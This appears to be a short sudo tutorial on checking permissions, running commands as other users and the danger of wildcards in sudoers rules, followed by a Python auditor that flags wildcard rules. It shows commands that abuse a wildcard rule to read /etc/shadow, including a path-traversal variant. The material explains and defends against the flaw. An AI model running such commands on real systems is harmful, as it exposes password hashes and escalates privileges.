What access do I have?
$ sudo -l
What access do other users have?
$ sudo -U username -l
Run a Command as Another User
Use the -u flag
$ sudo -u [username] [command]
Enter your password, not the root password
Run a Command as Another Group
Use the -g flag
$ sudo -g operator dump
$ sudo -g '#5' dump
Rules are processed in order; the last matching rule wins
Dangers of Wildcards (check with sudo -l, or read the sudoers file if you have access)
Pete ALL=/bin/cat /var/log/messages*
So you can view all the /var/log/messages archives...
$ sudo cat /var/log/messages /etc/shadow
or
$ sudo cat /var/log/messages/../../../etc/shadow
...and all the other files in the system
And many more...
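An audit for the wildcard problem above, as an added example that is not part of the original post or of sudo itself. It flags sudoers rules whose argument pattern contains a wildcard and shows why the Pete rule matches more than log archives. The helper names, the simplified rule parser and the SAMPLE text are assumptions made for illustration.

```python
import fnmatch
import re

# Handles only simple "user host = (runas) TAG: cmd args, cmd args" rules;
# aliases, Defaults, includes and escaped commas are skipped (assumption).
RULE = re.compile(r"^(\S+)\s+[^\s=]+\s*=\s*(?:\([^)]*\)\s*)?(.+)$")
TAG = re.compile(r"^(?:[A-Z_]+:\s*)+")
WILDCARD = re.compile(r"(?<!\\)[*?\[]")


def parse_rules(text):
    """Yield (user, command_path, arg_pattern) for each simple user rule."""
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(("#", "Defaults")) or "_Alias" in line:
            continue
        m = RULE.match(line)
        if not m:
            continue
        for spec in m.group(2).split(","):
            spec = TAG.sub("", spec.strip())
            path, _, args = spec.partition(" ")
            yield m.group(1), path, args.strip()


def args_match(arg_pattern, argv):
    """Approximate sudo's argument check: the arguments are joined into one
    string before matching, so '*' also matches spaces and '/'."""
    return fnmatch.fnmatchcase(" ".join(argv), arg_pattern)


def audit(text):
    """Return the rules whose argument pattern has an unescaped wildcard."""
    return [(u, p, a) for u, p, a in parse_rules(text) if WILDCARD.search(a)]


# Constructed sample sudoers content: the rule from this page plus a safe one.
SAMPLE = """\
# constructed sample
Pete ALL=/bin/cat /var/log/messages*
Ann ALL=(root) NOPASSWD: /usr/bin/systemctl restart nginx
"""

if __name__ == "__main__":
    for user, path, args in audit(SAMPLE):
        print(f"wildcard in arguments: {user}: {path} {args}")
```

Each rule it reports is a candidate for replacing the wildcard with an explicit list of file paths.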
References:
http://repository.root-me.org/Administration/Unix/EN%20-%20sudo%20:%20you're%20doing%20it%20wrong.pdf